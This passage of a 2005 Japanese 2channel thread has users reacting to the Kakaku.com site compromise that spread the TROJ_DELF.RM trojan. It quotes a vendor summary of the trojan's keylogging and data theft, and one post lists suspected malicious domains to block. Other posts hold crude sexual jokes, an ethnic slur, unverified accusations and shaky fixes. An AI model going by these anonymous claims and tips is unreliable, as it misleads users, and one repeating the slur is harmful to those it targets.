Content.IE5\SXYFG96B\a02[1].css=>/#.exeというのをデリートはしてるんだけど、
Content.IE5\SXYFG96B\a02[1].cssのuodateに失敗となっているんだが…
これはどういうこと?

737 :名無しさん@5周年:2005/05/16(月) 15:46:13 ID:5DzMGf/I
732は義務教育からやり直してください。

738 :名無しさん@5周年:2005/05/16(月) 15:46:18 ID:dComF7nh
あーもうだめだ、価格.COMのせいで自分のPC何も信じられなくなった

WindowsのPhotoshopでアイコラ作ったら
息子が辛抱たまらんようになった、これって抜いても大丈夫なの?

739 :名無しさん@5周年:2005/05/16(月) 15:46:26 ID:nPBp/a0a
まとめサイト、どこが更新されたかわかんないよー
upとか更新とか書いてほすぃ

740 :名無しさん@5周年:2005/05/16(月) 15:46:28 ID:ATkhus+v
欧米の音楽視聴サイトで視聴しようとしたら、別のサイトに飛んで、
別ウィンドウが何度も出てきて、重くなって、再インストールしますた

741 :名無しさん@5周年:2005/05/16(月) 15:46:43 ID:YmlaeCEq
価格コムに行ったかどうかはわからないけど
とりあえずチェック中。

742 :名無しさん@5周年:2005/05/16(月) 15:47:02 ID:a04pQUCq
>>731
起動してるソフト一覧のとこクリックしたらでてきた

743 :名無しさん@5周年:2005/05/16(月) 15:47:27 ID:ffB3v2cX
Sony.Co.jpの証拠がある掲示板ですね。



744 :名無しさん@5周年:2005/05/16(月) 15:48:40 ID:PGKaZvuX
ノートンだと5月11日が最新の定義ファイルなんだけど・・ヤバス・・

745 :名無しさん@5周年:2005/05/16(月) 15:48:51 ID:FSD8pwnX
問題のCSSファイルはキャッシュファイルのフォルダに無ければ大丈夫なの?

746 :名無しさん@5周年:2005/05/16(月) 15:49:04 ID:YSwFSIX9
>738
抜くのはノートンが正式に対応するまで待て。木曜くらいには抜いてもいいだろうな。
とにかく今回のウイルスは何がどうなるのかわからない。
前スレ339は
膣内射精したら彼女のおなかの中に、もうひとり人間ができたといっている。
これって自己複製してるってことだろ。
オナニーでも射精したら、ゴミ箱の中に人間が溢れることになりかねない。

747 :名無しさん@5周年:2005/05/16(月) 15:49:26 ID:Dnp+ylCF
>>743
Σ(´д`;)!!!!

748 :名無しさん@5周年:2005/05/16(月) 15:49:32 ID:QBl1l8ax
>>738
だめだめ! そういうときは、ハンマーで叩いてひっこめなさい。

749 :名無しさん@5周年:2005/05/16(月) 15:49:41 ID:WVkIcFt7 ?
>>733
社長かこいいな

750 :名無しさん@5周年:2005/05/16(月) 15:51:02 ID:YmlaeCEq
検査したところ、ウイルスは無かったみたいだが、
D:\pagefile.sys - ファイルを開く時にエラーが発生しました (ファイルはロックされています) [4]
の文が出てきました。
問題ありますか?


751 :名無しさん@5周年:2005/05/16(月) 15:51:28 ID:b7ZGjSnu
これってテロ?

752 :名無しさん@5周年:2005/05/16(月) 15:51:39 ID:OHiG2ONM
ここ最近アクセスしてたから俺のPCはもう感染してるのか…
価格の責任で検査プログラムだせや

753 :暫定まとめサイト作成中の人:2005/05/16(月) 15:51:46 ID:1OIbpppz
>>739
がんばってみる

754 :名無しさん@5周年:2005/05/16(月) 15:51:56 ID:H74G9PEq
馬鹿が多いなw

755 :名無しさん@5周年:2005/05/16(月) 15:52:13 ID:fsvCpk7/
NOD32のデープスキャンでも何も出てこなかった
よかったよかった


756 :名無しさん@5周年:2005/05/16(月) 15:52:30 ID:xJHit+Rp
>>754
お前を筆頭にな( ´,_ゝ`)

757 :名無しさん@5周年:2005/05/16(月) 15:52:34 ID:nPBp/a0a
社長 すごい好み♪

758 :名無しさん@5周年:2005/05/16(月) 15:52:37 ID:UnrBrUfK
>>750
うん。

759 :名無しさん@5周年:2005/05/16(月) 15:52:40 ID:R+7M+WGc
体験版が落とせない(アクセス集中で落とせないなんて判らない)
もしかしたら感染してるため?
と思い、NOD買ってきました

カカクコム様の領収書見せれば費用出してくれるかな?

実際感染してたし

760 :名無しさん@5周年:2005/05/16(月) 15:52:50 ID:nCCqm6xH
ウィルスのスクリプトをtxtでここに貼り付けたら怒られるだろうな

761 :名無しさん@5周年:2005/05/16(月) 15:52:52 ID:kJuiUGB2
犯人は豚箱いきだな

762 :名無しさん@5周年:2005/05/16(月) 15:52:55 ID:HwdbYKu/
犯人はつぶれたボッタクリ店関係者か?
毎日入札0のヤフオクストアかも

地方民は近所の店で現品チェック→通販でGETが主流だからな

763 :名無しさん@5周年:2005/05/16(月) 15:53:05 ID:aqN8CNfN
yahooのニュースで
>利用者の被害は報告されていない。
とか出ていて凄いむかつく。
起因した詐欺とかまだ無いのかもしれないけど
ウイルス駆除の手間とかスパムとか充分被害にあっているんじゃい。

潰れろ!潰れろ!とっとと潰れろ!!! byふとんオバサン

764 :名無しさん@5周年:2005/05/16(月) 15:53:10 ID:dComF7nh

トロイ式のウィルスってことは、外部にデータを
送信するわけだけど、例えば外部データ送受信をしない
ソフトやデータ(たんなるexeとかdocとかtxtとかのファイル)を
起動して、モデムやルータが「チカチカ」光らなければセーフ、
みたいな感じなの?

これで合ってたら、とりあえずうちはセーフっぽいが…。

765 :名無しさん@5周年:2005/05/16(月) 15:53:32 ID:gyhoJ9jr
>>759
先日の騒動でバスターは復旧費用出したよ。

766 :名無しさん@5周年:2005/05/16(月) 15:54:11 ID:txnqvwqg
バスターまだ〜?

>トレンドマイクロによると、このTrojan_Delf.RMが、
>価格.comでばら撒かれたウイルスの1つであることが確認された。
>パターンファイル2.631.00で対応済みだ。
>ほかのウイルスについては調査を継続するという。

http://www.itmedia.co.jp/enterprise/articles/0505/16/news022.html

767 :名無しさん@5周年:2005/05/16(月) 15:54:28 ID:gyhoJ9jr
>>763

468 名前:名無しさん@お腹いっぱい。 投稿日:2005/05/16(月) 15:28:23
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/
またカカクコムは,対象となるウイルスを検知・削除できる対策ソフト
(キヤノンシステムソリューションズの製品体験版)を,
自社のサイトで16日から配布し始めた。

ただし,すでに他社のウイルス対策ソフトを導入しているユーザーは
ソフトウエアが競合する可能性があるため,このソフトは併用できない。

「他社製品のユーザーがどのように対処すれば良いのかは,
各ウイルス対策ソフトのベンダーと話し合っている最中。
新しい種類のウイルスであるとの情報もある」(広報室)。

ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
工エェ(´Д`)ェエ工


768 :名無しさん@5周年:2005/05/16(月) 15:55:06 ID:a04pQUCq
>>750
俺も検査中だけど、それでてる C:\pagefile.sys -
あと 
C:\hiberfil.sys - ってのも ファイルを開く時にエラーが発生しました (ファイルはロックされています) [4]
となってる 
なんだろう〜

769 :名無しさん@5周年:2005/05/16(月) 15:55:43 ID:zZhz/MhN
>>750
男前だなー

770 :名無しさん@5周年:2005/05/16(月) 15:55:59 ID:Dnp+ylCF
>>764
そんな確認方法はちょっとどうかと。
プロセス監視するファイアウォールソフトで確認すべきです。
よくわからないならばZoneAlarmが簡単でしょう。

771 :名無しさん@5周年:2005/05/16(月) 15:56:02 ID:QBl1l8ax
>>757
モーホー? おにゃご? あんたどっちさ?
>>750
メモリー増やせ。

772 :名無しさん@5周年:2005/05/16(月) 15:57:03 ID:vxVMLgDs
NODってインターフェイス糞だな。スキャンして即効アンインスコ。

773 :名無しさん@5周年:2005/05/16(月) 15:57:09 ID:dhMOAMJo
さっさとOS再インスコすりゃーいい話だ。

774 :名無しさん@5周年:2005/05/16(月) 15:57:29 ID:5AI+Kcef
マンドクセ

775 :769:2005/05/16(月) 15:57:56 ID:zZhz/MhN
>>750
間違えたオマエ男前違う

>>733
こっちだ

776 :名無しさん@5周年:2005/05/16(月) 15:59:06 ID:CSWc/K0c
しかし困ったもんだ。
トロイが仕込まれしかも亜種で発覚時にノートンとバスターの定義に登録されてないときた。

4日間も放置しやがって。
トラッキングで犯人突き止めたんだろうな?

777 :名無しさん@5周年:2005/05/16(月) 15:59:41 ID:htiPbfd9
>>766
まだ。
セキュ板でオンラインスキャンしてる奴がいたけど、未対応なのにスキャンしても引っかかるハズないからw

778 :名無しさん@5周年:2005/05/16(月) 15:59:57 ID:5DzMGf/I
>>750
それは仮想メモリ領域だから使用中なだけ

779 :名無しさん@5周年:2005/05/16(月) 16:00:17 ID:EX0hMOct
>>767
無茶苦茶だな・・・・。
PCが動かなくなった不具合の情報をメールでくれというサポートの小話と同じくらい。

780 :名無しさん@5周年:2005/05/16(月) 16:00:18 ID:3meUWQjb
>>733
キャパクラとかでブイブイ言わせてそうな面構え。

781 :名無しさん@5周年:2005/05/16(月) 16:00:46 ID:gyhoJ9jr
>>775
堀衛門とは大違いだな。イッチーに似てる。
http://www.itmedia.co.jp/lifestyle/articles/0403/31/mn_kakaku1.jpg
http://japan.internet.com/img2/20040401_ncbc_1.jpg
http://it.nikkei.co.jp/it/photo/tebari/gasshuku04/akita.jpg
http://pcweb.mycom.co.jp/news/2003/10/09/12l.jpg
http://pcweb.mycom.co.jp/news/2004/05/25/003l.jpg
https://www.dreamcity.jp/life/images_uniq/career/consultant/t_int_vol10_2.jpg
https://www.dreamcity.jp/life/images_uniq/career/consultant/t_int_vol10_4.jpg

782 :名無しさん@5周年:2005/05/16(月) 16:00:52 ID:K1D6s46W
nod詳細でスキャンしたらえらく掛かるな。HDD熱くなりまくり

783 :名無しさん@5周年:2005/05/16(月) 16:01:55 ID:QlUSscTI
http://canon-sol.jp/supp/nd/wndt7001.html
質問
オンデマンドスキャナでの検査時に「pagefile.sys - ファイルを開くときにエラーが発生しました」と表示される。

回答
このメッセージはNOD32アンチウイルスの異常な動作を示すものではございません。
「pagefile.sys」は仮想メモリ技法を実現するためのスワップファイル、「hiberfil.sys」はコンピュータが休止状態に移行する時にメモリの内容をファイルに保存するために使用されるファイルです。
上記は Windows のシステムが排他的に利用しているファイルで、他のアプリケーションから開くことができません。

784 :名無しさん@5周年:2005/05/16(月) 16:02:23 ID:kSSoyHo2
ProxのBlockリストは何れに追加すればよろしいのでしょうか?
AdList?
CookieList?

すいません。ご教示下さい。

785 :名無しさん@5周年:2005/05/16(月) 16:02:37 ID:Rvm/rVcr
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。
>ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケースはないと認識している」(同)という。


ふざけろ

786 :名無しさん@5周年:2005/05/16(月) 16:02:49 ID:B9T886Ew
ところでNOD32入れて調べた人達は既存のアンチウイルスソフトわざわざアンインスコしたの?
重ねるとやばくね?

787 :名無しさん@5周年:2005/05/16(月) 16:03:10 ID:3IfcnxDJ
>>785
人が死んでんねんでー

788 :名無しさん@5周年:2005/05/16(月) 16:03:33 ID:aqN8CNfN
>>767
おまいらが感染したのはカカクのせいではないと?
責任転嫁でつか?
クズ企業め!

789 :名無しさん@5周年:2005/05/16(月) 16:03:38 ID:wiKuKDai
仮想メモリは切ってよし

790 :名無しさん@5周年:2005/05/16(月) 16:03:41 ID:68rs+ca2
>ノートンなどと併用しても問題ないBitDefender Free Editionを導入
http://www.altech-ads.com/product/10000839.htm

これ落とせないんですが…


791 :名無しさん@5周年:2005/05/16(月) 16:04:01 ID:RxxGxRz3
>>787
あるあるwwww

792 :名無しさん@5周年:2005/05/16(月) 16:04:30 ID:lciRWJlW
>>776
実は数日気付かなかったようだよ
なんでも内部犯行説もあり?

793 :名無しさん@5周年:2005/05/16(月) 16:04:51 ID:pCBCNS6C
ノートン先生、ラピッドリリース来たよ
ftp://ftp.symantec.com/AVDEFS/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe

794 :名無しさん@5周年:2005/05/16(月) 16:05:00 ID:3meUWQjb
馬鹿だな、社長は。
こういう難局に際してのユーザーへの対応が
その後の評価を決めるのに。
雪印しかり、三菱しかり。
見習え、丸紅を。

795 :名無しさん@5周年:2005/05/16(月) 16:05:10 ID:QBl1l8ax
要するに牛が反芻してるときには、牛の口の中は以前に食べたモノで一杯だから「みちゃいやん」ってこった。

796 :名無しさん@5周年:2005/05/16(月) 16:05:44 ID:A72FbEN2
ノートン、更新しろとうるさいからアンインスコした

797 :名無しさん@5周年:2005/05/16(月) 16:05:50 ID:5DzMGf/I
>>779
つまり価格.comのサーバにはウイルスは無くて
外部のサイトに飛ばされて、そこにウイルスがあるって意味で
そう書いてんじゃね?

798 :名無しさん@5周年:2005/05/16(月) 16:06:51 ID:fsvCpk7/
スーパーマリオの音楽の変な曲って誰歌店の?

799 :名無しさん@5周年:2005/05/16(月) 16:07:30 ID:pLbDlmYm
オレンジレンジ

800 :名無しさん@5周年:2005/05/16(月) 16:07:31 ID:k6puqPLn
感染した香具師!集団訴訟起こしませんか?
一人上がりの被害額は50万で行くつもりです。

801 :名無しさん@5周年:2005/05/16(月) 16:07:44 ID:gyhoJ9jr
>>798
ゲオでかかってる奴?

802 :名無しさん@5周年:2005/05/16(月) 16:08:17 ID:Dh+TG1IF
>>797
2ちゃんにグロ画像へのリンクが貼られて削除依頼出したとき、

「2ちゃんには画像は貼れませんので、アプロダさんのほうへ文句言ってください」

って削除人が答えてるのとおんなじってことだなw

803 :名無しさん@5周年:2005/05/16(月) 16:08:46 ID:aqN8CNfN
>>797
779じゃないけど
でもさ捌ページに飛ばすのだって感染する原因にならね?

804 :名無しさん@5周年:2005/05/16(月) 16:09:38 ID:dyPIlHLc
>>790
つttp://bitdefender.gooside.com/

805 :名無しさん@5周年:2005/05/16(月) 16:09:57 ID:PGKaZvuX
www.j4sb.comに飛ばされると履歴に残る?「www.j4sb.com」で検索して出てこないからって意味ない・・?

806 :名無しさん@5周年:2005/05/16(月) 16:09:57 ID:5Bby6kQI
>797
仮にそうだとしても、数日そのままにして事実上放置した理由にはならんな・・・

807 :名無しさん@5周年:2005/05/16(月) 16:10:13 ID:5AI+Kcef
「原因」の定義を思いっきり狭く解釈してるよな>イケメン

808 :名無しさん@5周年:2005/05/16(月) 16:10:39 ID:74qK87o3
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

809 :名無しさん@5周年:2005/05/16(月) 16:11:08 ID:aqN8CNfN
>>802
この場合は書き込みされたのが問題ではないかと…

810 :名無しさん@5周年:2005/05/16(月) 16:11:20 ID:v8Lbdpbk
普通の神経してたら、不正アクセスに気づいた時点で
ネットワーク遮断して原因と被害調査調べるもんじゃないのか?

811 :名無しさん@5周年:2005/05/16(月) 16:11:25 ID:3meUWQjb
>>807
まぁ、半島人の得意技だから。

812 :名無しさん@5周年:2005/05/16(月) 16:11:29 ID:eyaxgRaB
なぁ、いくらWindowsをLinuxに急遽置いたとはいえ
なんでクラックされて信頼性のない
httpのkakaku.comで配布してるんだ?

そのファイルがなんらかのウィルスに感染してるんじゃないかと
警戒しないとダメじゃない?

DNS Spoofingされてたりする可能性だってあるし・・・

813 :名無しさん@5周年:2005/05/16(月) 16:12:16 ID:LRx3pbze
こりゃ、OS再インスコのほうが確実だな。

814 :名無しさん@5周年:2005/05/16(月) 16:12:22 ID:emTUY5ia
なぁ、>>812の日本語おかしくないか?


815 :名無しさん@5周年:2005/05/16(月) 16:12:27 ID:3IfcnxDJ
>>812
お前に日本語は無理。

816 :名無しさん@5周年:2005/05/16(月) 16:12:53 ID:4VsAQQ5/
ナウ会社で自宅PCが気が気でならない。
おまいらガンガレ

817 :776:2005/05/16(月) 16:12:56 ID:CSWc/K0c
>>792
え"?気付かなかったって?
知障か?w

内部犯行説もでてるようだしだいぶ錯綜してるな。
価格もここまで広範囲に影響与えたんだから、誠実かつ迅速な情報公開をせんとな。

818 :名無しさん@5周年:2005/05/16(月) 16:13:18 ID:7w2bdB8z
BitDefender Free Editionの使い方教えて!!

819 :名無しさん@5周年:2005/05/16(月) 16:13:20 ID:gU/kRCfa
ウホ
イッチーは口がゆがんでてひきつり顔だったけどこっちは本物のイケメンだ

820 :名無しさん@5周年:2005/05/16(月) 16:13:34 ID:ghmt3e0n
.cssで検索しても見つからなかったどうやら俺は大丈夫なのかな・・・
11日以降アクセスしてるかどうか微妙なところだから見つからなかったとはいえ心配だ

821 :名無しさん@5周年:2005/05/16(月) 16:15:54 ID:oudIof05
>>10
くさるほどあるんだが・・・・・・・

822 :名無しさん@5周年:2005/05/16(月) 16:16:39 ID:EB/iycnr
会社は、ウィルスバスタコーポレートエディションで、これを勝手にアンインストールできない。
こんな場合、NOD32で検索するためには、どうすれば良いのか、教えて下さい。

823 :名無しさん@5周年:2005/05/16(月) 16:16:41 ID:AEh3IMqQ
最終アクセス日時って調べられる?

824 :名無しさん@5周年:2005/05/16(月) 16:16:47 ID:mUC+sZgR
先週金曜日に使ったけど感染してなかった。
手に負えないと判断して一時閉鎖した方が良かったね。
顧客に余計な手間を掛けさせるのはよろしくないです。

825 :名無しさん@5周年:2005/05/16(月) 16:16:56 ID:cf7sO0Rh
ほほ〜、大手がノーマークだった新しいウイルスをなぜか
NOD32は検出可能で、価格.comもさくっとそれに気づいた
わけか。

ふ〜ん

826 :名無しさん@5周年:2005/05/16(月) 16:17:02 ID:EB5pMfvi
>>820
見つからなかったけどWin32/PSW.Delf.FZに感染してた。

827 :名無しさん@5周年:2005/05/16(月) 16:17:13 ID:m8aC5QUj
体験版インスコして、しばらくしたらネットに繋がらなくなったぞ
再起動しても駄目だった
しょうがないからアンインスコして再起動したら普通に繋がった 何だこの糞ソフト

828 :JR西日本と同じ経営体質:2005/05/16(月) 16:17:33 ID:13e05CM/

価格.comって、
こんなにレベルの低いセキュリティしか施していなかったのかよ。
金儲け第一主義で、ユーザーの安全性なんて
ほとんど考えていなかったのね。

JR西日本と同じ経営体質だな。



829 :名無しさん@5周年:2005/05/16(月) 16:17:39 ID:7YFgBfFM
トレンドマイクロでは「TROJ_DELF.RM」の自動駆除ツールを
ご用意いたしました。以下のURLからダウンロード後、実行することによって
自動的に駆除が行えます。ご利用ください:
http://www.trendmicro.co.jp/support/virus/fix_tool/TROJ_DELF_RM/fix_delfRM.com

830 :名無しさん@5周年:2005/05/16(月) 16:18:06 ID:1gzPLeNy
災い転じて福となす。
ウイルススキャンすれば別のウイルスも駆除できるじゃないか。
めんどくさがらず検索しろ。

831 :名無しさん@5周年:2005/05/16(月) 16:18:27 ID:ghmt3e0n
>>826
orz

832 :名無しさん@5周年:2005/05/16(月) 16:18:41 ID:jjxrOUdO
50 名無しさん@お腹いっぱい。 New! 2005/05/16(月) 15:48:07 ID:???

価格.comって、
こんなにレベルの低いセキュリティしか施していなかったのかよ。
金儲け第一主義で、ユーザーの安全性なんて
ほとんど考えていなかったのね。

JR西日本と同じ経営体質だな。


『価格.com』サイバー攻撃によりHP閉鎖!
http://pc8.2ch.net/test/read.cgi/pcnews/1116180106/


833 :名無しさん@5周年:2005/05/16(月) 16:18:57 ID:s53gXUDR
あぼ〜ん推奨

www.0x61.com
www.shtm1.com
www.j4sb.com
kakaku.com
nobisuku-sendai.net/index.asp
a02
a05

834 :でもね:2005/05/16(月) 16:19:06 ID:eYpeupO3
>>830
その為にはNOD32じゃダメなわけで(w

835 :名無しさん@5周年:2005/05/16(月) 16:20:02 ID:ffB3v2cX
それが価格.comの仕様だ!
価格.comのやり方に合わせて貰うしかない。



836 :名無しさん@5周年:2005/05/16(月) 16:20:05 ID:5DzMGf/I
NOD32でスキャンしても見つからないし、セッション見ててもどこにも繋ごうとしないし。
問題ないな・・・。

837 :名無しさん@5周年:2005/05/16(月) 16:20:13 ID:7w2bdB8z
>>823
5/11、23:01、17ファイル検出。
ノートンがアンインストールできません。

838 :名無しさん@5周年:2005/05/16(月) 16:21:09 ID:QON7Tnqs
欝箱って何?

再起動成功!

839 :名無しさん@5周年:2005/05/16(月) 16:21:42 ID:AEh3IMqQ
>>837
な、な、なんだってー(AA マンドクセェ

840 :名無しさん@5周年:2005/05/16(月) 16:22:25 ID:q75C2lEK
>>828
/.Jのスレでは、自称元中の人が次のように書いてる

元中の人から言わせると、自業自得です。
セキュリティ対策は当初からボロボロだったのですが、
それを指摘すると技術屋のトップ(とはいっても一作業員でもあった人)が
「そんな事は気にしなくていいです」と無下に却下していました。
いくつか攻撃コードも示したのですが、危機感をもってくれませんでした。
「そんなことをする人は居ない」とか「今までも安全だった」などという言葉も聞きました。
MSから出るセキュリティパッチも検証の手間を嫌がって当てていなかったです。
検証する人手が足りないのであれば、それを上に申請すればいいのに、それもやっていなかったですね。

# まぁ、私の話の持って行き方も相当未熟でしたから、ある意味当然だったと思いますけど。

その後に来たCTOさんも、あまり危機感を持たなかったのかもしれません。
今頃は対処に追われているのでしょうけど、内情を知っていれば作業員に同情することは難しいです。
「当時からの」という限定だけはつけますけど。

841 :名無しさん@5周年:2005/05/16(月) 16:22:43 ID:Dh+TG1IF
つか、ウイルスに感染した!とか書いてる香具師って感染したPCから書いてんの?
回線切ってよー

842 :名無しさん@5周年:2005/05/16(月) 16:23:38 ID:1gzPLeNy
>>822 バスターアンインスコせずそのままNOD32をインストールしても大丈夫だったぞ。
コーポレートでもたぶんいけますよ。


843 :名無しさん@5周年:2005/05/16(月) 16:23:41 ID:ibd8ldgy
今使ってるソフト削除してNOD32入れろってことか

844 :名無しさん@5周年:2005/05/16(月) 16:23:43 ID:RE5nqFzZ
感染してたからメールで問い合わせてもう5時間返信コネー

845 :NAO:2005/05/16(月) 16:23:55 ID:SYqqoQaO
結局、弄られてたわけか・・・
どうりで動きが挙動不審だと思ったら・・・

846 :名無しさん@5周年:2005/05/16(月) 16:24:42 ID:cTqVOA64
>>825
だろ?
NOD32が自らウイルス作って価格comとつるんで宣伝してんじゃねーのかよ
って思う人がいても不思議じゃないよな
そういえばそんな映画もあったよなー

847 :名無しさん@5周年:2005/05/16(月) 16:25:06 ID:JSo2gKgF
firefox 1.04 を入れたらできる 2005/05/11 20:00 の.cssは無視していいんだよね?

848 :名無しさん@5周年:2005/05/16(月) 16:25:26 ID:PGKaZvuX
だからMrシモムラなんだよ

849 :名無しさん@5周年:2005/05/16(月) 16:25:35 ID:UPvVocYm
シマやん対応まだあー?

850 :名無しさん@5周年:2005/05/16(月) 16:26:24 ID:QON7Tnqs
ハードディスクとマザボつなぐケーブル逆ざししたみたいでハードディスクが活動中か分からない
恐い

851 :名無しさん@5周年:2005/05/16(月) 16:26:46 ID:Dh+TG1IF
カカクドットコムを恨んでる業者多そうだから、
この事件の尻馬に乗ってここぞとばかりにキャッキャ叩いてる人多そうw
悪口書かれてたとことか特に・・・

852 :NAO:2005/05/16(月) 16:26:57 ID:SYqqoQaO
>>850
え、釣り?

853 :名無しさん@5周年:2005/05/16(月) 16:27:31 ID:a4+HxoyD
>>846
だとしたら宣伝は大失敗だな こんな糞ソフト

854 :名無しさん@5周年:2005/05/16(月) 16:27:34 ID:MqvxOOka
FirefoxやOperaを常用してる奴は常に勝ち組ということがまた示されたわけだな。
上の方のFirefoxのセキュリティーホールとは違う話みたいだし。

855 :名無しさん@5周年:2005/05/16(月) 16:28:10 ID:eDYUgkJ2
>>853
俺もさっそくアンインスコした。

856 :@@@:2005/05/16(月) 16:28:51 ID:NfnH9v/L
ふぉおおおおおおおおおおおお!!!!!!!!!!!!!!
やべばああああああああああああああああsll
あおまえrrrらどうすればいいかおしえればれあれっssss


まじやんばああああああああああああああああああいいいいいいいいいいいいいいいいい

857 :名無しさん@5周年:2005/05/16(月) 16:28:56 ID:Dh+TG1IF
SONY社員が自作自演したのってここの掲示板だっけ?

858 :名無しさん@5周年:2005/05/16(月) 16:29:21 ID:htiPbfd9
IEとOEを常用してる奴はアフォ。

859 :名無しさん@5周年:2005/05/16(月) 16:30:26 ID:xH+TC5Lo
トレンドマイクロ社内でも徐々に冷ややかな対応になってきている模様。

860 :名無しさん@5周年:2005/05/16(月) 16:30:28 ID:JEnqNLvm
>>854
大衆化すればするほど、脆弱性が増える罠

861 :名無しさん@5周年:2005/05/16(月) 16:30:31 ID:AAnXS2CS
>854
結局その2つもユーザー増えたら標的になるのでは?
IEは穴だらけの上に9割以上が使ってるわけですから。
どちらも1割を超えたら標的になるんじゃないかな、と。

862 :名無しさん@5周年:2005/05/16(月) 16:30:51 ID:vQgOyJWG
>>822
NOD32をウイルス常時監視にしなければ(インスト時に設定を変更しないだけ)
問題ないです。

863 :名無しさん@5周年:2005/05/16(月) 16:30:54 ID:QON7Tnqs
>>852
>>852
いや、アクセスランプのケーブルの間違いだった

光りっぱなしで現状が良く分からない

864 :名無しさん@5周年:2005/05/16(月) 16:31:14 ID:VAQRnEL6
>>854
マカーの俺は常に不戦勝

865 :名無しさん@5周年:2005/05/16(月) 16:31:25 ID:fsvCpk7/
>>856
さんこちゃんはグーグクルにも引っ掛かって
カカクもやばくて大変だね

866 :名無しさん@5周年:2005/05/16(月) 16:31:37 ID:emo6NlMo
>>864
わらかすな

867 :名無しさん@5周年:2005/05/16(月) 16:33:51 ID:8xtB+QKM
タブブラウザの俺も勝ち組だな

868 :NAO:2005/05/16(月) 16:34:28 ID:SYqqoQaO
>>854
自分でブラウザ組んじゃうってのが最強かとw

>>864
それ、ある意味悲しい。

>>863
なら、さっさと挿し変えちゃえ。

869 :名無しさん@5周年:2005/05/16(月) 16:34:43 ID:VAQRnEL6
>>861
ドイツでは2割以上なんだがな
http://internet.watch.impress.co.jp/cda/news/2005/05/13/7593.html

870 :名無しさん@5周年:2005/05/16(月) 16:35:05 ID:HwdbYKu/
HP閉鎖直前まで何度もアクセスしてたのに感染なし
Win98SEは無関係?

871 :名無しさん@5周年:2005/05/16(月) 16:35:56 ID:9Nhrj1gk
>>829
これを実行したあと、fix_delfRMってフォルダが作成されて、その中にdebugとreportってフォルダが入ってる
reportフォルダの中には、20050516って名前のテキストがあって、

Damage Cleanup Engine (DCE) 3.9(Build 1020)
Windows XP(Build 2600: Service Pack 2)

Start time : 月 5 16 2005 16:31:29

Load Damage Cleanup Template (DCT) "C:\Documents and Settings\Owner\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]

Complete time : 月 5 16 2005 16:31:29
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)


って書かれてる ウィルス無しってことですね

872 :名無しさん@5周年:2005/05/16(月) 16:36:08 ID:Wy+qLBNo
結局ネタ?

873 :名無しさん@5周年:2005/05/16(月) 16:36:22 ID:QON7Tnqs
情報が錯綜している中、何が正しい情報なのか見切る目が必要と言えるのではないでしょうか

とそれらしくまとめてみた

874 :名無しさん@5周年:2005/05/16(月) 16:36:34 ID:Dh+TG1IF
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

TROJ_DELF.RM

特 徴:
2005年5月11〜14日にかけて有名サイトである「価格.com」(http://kakaku.com)の
Webページが不正に改竄された事例が確認されました。
この改竄されたWebを閲覧していた場合、
「TROJ_DELF.RM」が自動的にインストールされている可能性があります。

これは一般的に「トロイの木馬」に分類される不正プログラムです。

影響を受けるソフトウェア:
Windows 95, 98, ME, NT, 2000, XP

「TROJ_DELF.RM」の動作は以下のとおりです。
・システムに自身をインストール
・ファイルを作成
・情報漏洩
   ユーザのキー入力操作情報を収集
・Webサイトからファイルをダウンロード
・プロセスの強制終了
・Webサイトにアクセス

対応方法:

検出したファイルはすべて削除してください。単体で動作する一個の独立したプログラムであり、
他のファイルへの感染活動はありません。感染活動を行わない不正プログラムですので
ウイルスバスターなどウイルス対策製品の機能で「駆除」処理は行えません。
製品で「ウイルス発見時の処理」の設定が「ウイルス駆除」になっている場合
「駆除できません。 隔離しました。」などと表示されますが正常な表示です。

875 :名無しさん@5周年:2005/05/16(月) 16:37:03 ID:zZhz/MhN
>>867
オレなんかwebboyだぜ

876 :名無しさん@5周年:2005/05/16(月) 16:37:17 ID:VAQRnEL6
>>864
こうやって対岸の火事を眺めるのもオツなものですよw

877 :名無しさん@5周年:2005/05/16(月) 16:37:23 ID:vmhkl0qk
なんかどさくさに紛れて
Firefox中毒の人そんなに、必死に宣伝しなくても(^_^.)

878 :名無しさん@5周年:2005/05/16(月) 16:37:27 ID:eDYUgkJ2
>>871
現状ではそのツールでの駆除感染報告は未確認だけどね。
感染してたのに駆除できなったって報告も同様に未確認。

879 :NAO:2005/05/16(月) 16:37:46 ID:SYqqoQaO
>>870
98SEも対象だった気がするよ。

880 :名無しさん@5周年:2005/05/16(月) 16:37:49 ID:s53gXUDR
>>870
関係大有り

881 :名無しさん@5周年:2005/05/16(月) 16:37:56 ID:+uc1b8vf

粘着アニメ少女(=からんからん堂=長野在住の上河成子)の奴、

とうとうというか、やっぱりやりやがったな。

ホントにあの陰湿バカは困った奴だ。


882 :名無しさん@5周年:2005/05/16(月) 16:37:59 ID:VU1btMen
FirefoxやOperaのユーザーが増えたところで
一番の標的がIEであることは揺るがんだろ

883 :名無しさん@5周年:2005/05/16(月) 16:38:26 ID:rxjOCrao
>>857
松下社員も工作活動がばれてた

【衝撃】松下社員が価格コムBBSで他社製品を中傷?!
http://news19.2ch.net/test/read.cgi/news/1107450933/

884 :名無しさん@5周年:2005/05/16(月) 16:39:28 ID:Y1uYQypx
EXPLORER.EXE検索したら2つも出てきた・・・

885 :名無しさん@5周年:2005/05/16(月) 16:39:48 ID:VAQRnEL6
>>876>>868へのレスだったorz

886 :名無しさん@5周年:2005/05/16(月) 16:40:07 ID:vmhkl0qk
>>883
価格comに限らずここの家電板覗けば、そんなのすぐにわかるよ。

887 :名無しさん@5周年:2005/05/16(月) 16:40:26 ID:eDYUgkJ2
>>884
そこで駆除ツールの登場ですよ
http://www.trendmicro.co.jp/support/virus/fix_tool/TROJ_DELF_RM/fix_delfRM.com

888 :名無しさん@5周年:2005/05/16(月) 16:40:32 ID:Dh+TG1IF
>>883
SONYと松下がやってたのならば、もっと小さい企業は当然のごとく
工作活動してたんだろうねw
企業同士の足の引っ張り合いが裏ではドロドロあったということか
